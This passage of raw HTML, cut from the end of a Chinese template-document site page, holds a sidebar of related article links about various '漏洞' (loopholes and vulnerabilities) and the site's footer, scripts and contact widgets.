target="_blank">如何改进现行财务漏洞</a></li><li><a href="/a5/2019051315/2540cd0fb8be8c69.html" title="网站漏洞整改报告" target="_blank">网站漏洞整改报告</a></li><li><a href="/a6/2019051318/5bf3b546d4c13593.html" title="生物资源与利用总结范文大全" target="_blank">生物资源与利用总结范文大全</a></li><li><a href="/fanwen/zhenggai/eb6d9f1bbb8b541f.html" title="网站漏洞整改报告（五篇材料）" target="_blank">网站漏洞整改报告（五篇材料）</a></li><li><a href="/a14/2019051422/f0bd0b8154ae6297.html" title="监外执行：须多方堵塞“漏洞”（范文模版）" target="_blank">监外执行：须多方堵塞“漏洞”（范文模版）</a></li><li><a href="/a3/2019051221/ca7eacad6c2f655c.html" title="制度漏洞评估分析报告" target="_blank">制度漏洞评估分析报告</a></li><li><a href="/a3/2019051222/8b5866495950d76d.html" title="劳动合同法19个漏洞和缺陷" target="_blank">劳动合同法19个漏洞和缺陷</a></li><li><a href="/a10/2019051416/f5037862421d735e.html" title="餐饮管理软件怎么防止收银漏洞（合集）" target="_blank">餐饮管理软件怎么防止收银漏洞（合集）</a></li></ul> </aside> </div> </div> </div> </div> </div> </section> <section id="footer" class="p30"> <div class="container"> <div class="footer-top clearfix"> <div class="copyr"> <div class="footer-menu clearfix mb10"> <ul class="footer-menu-con"> <li><a href="/a1/">1号文库</a></li><li><a href="/a2/">2号文库</a></li><li><a href="/a3/">3号文库</a></li><li><a href="/a4/">4号文库</a></li><li><a href="/a5/">5号文库</a></li><li><a href="/a6/">6号文库</a></li><li><a href="/a7/">7号文库</a></li><li><a href="/a8/">8号文库</a></li><li><a href="/a9/">9号文库</a></li><li><a href="/a10/">10号文库</a></li><li><a href="/a11/">11号文库</a></li><li><a href="/a12/">12号文库</a></li><li><a href="/a13/">13号文库</a></li><li><a href="/a14/">14号文库</a></li><li><a href="/a15/">15号文库</a></li> </ul> </div> Copyright © 2018 <a href="/">写写帮文库</a> All Rights Reserved <a target="_blank" href="http://www.beian.miit.gov.cn" rel="nofollow"> 浙ICP备11058632号</a> <script type="text/javascript" src="//static.xiexiebang.com/skin/default/js/tj.js"></script> </div> </div> </div> </section> <script type='text/javascript' src='//static.xiexiebang.com/skin/default/js/superfish.js'></script> <script type='text/javascript' src='//static.xiexiebang.com/skin/default/js/jquery.slicknav.js'></script> <script type='text/javascript' src='//static.xiexiebang.com/skin/default/js/xs.js'></script> <div class="right_bar hidden-xs "> <ul> <li class="rtbar_li1" style="left: 0px;"><a><img src="//static.xiexiebang.com/skin/default/images/rtbar_liicon3.png"></a></li> <li class="rtbar_li2"> <a href="javascript:void(0);"> <img src="//static.xiexiebang.com/skin/default/images/rtbar_liicon4.png"> </a> <div class="rtbar_shwx" style="display: none;"> <img width="188" height="188" alt="微信二维码" src="//static.xiexiebang.com/skin/default/images/wechat.png"> </div> </li> <li class="rtbar_li3" style="left: 0px;"> <a href="tencent://message/?uin=2261362615&Menu=yes"> <img src="//static.xiexiebang.com/skin/default/images/rtbar_liicon2.png"> 点击咨询 </a> </li> <li class="rtbar_li5"><a href="#1">第一篇</a></li> <li class="rtbar_li6"><a href="#2">第二篇</a></li> <li class="rtbar_li7"><a href="#3">第三篇</a></li> <li class="rtbar_li8"><a href="#4">第四篇</a></li> <li class="rtbar_li9"><a href="#5">第五篇</a></li> <li class="rtbar_li10"><a href="#6">更多</a></li> <li class="rtbar_li4 gotop"> <a href=""><img src="//static.xiexiebang.com/skin/default/images/rtbar_liicon1.png"> </a></li> </ul> </div> </body> </html>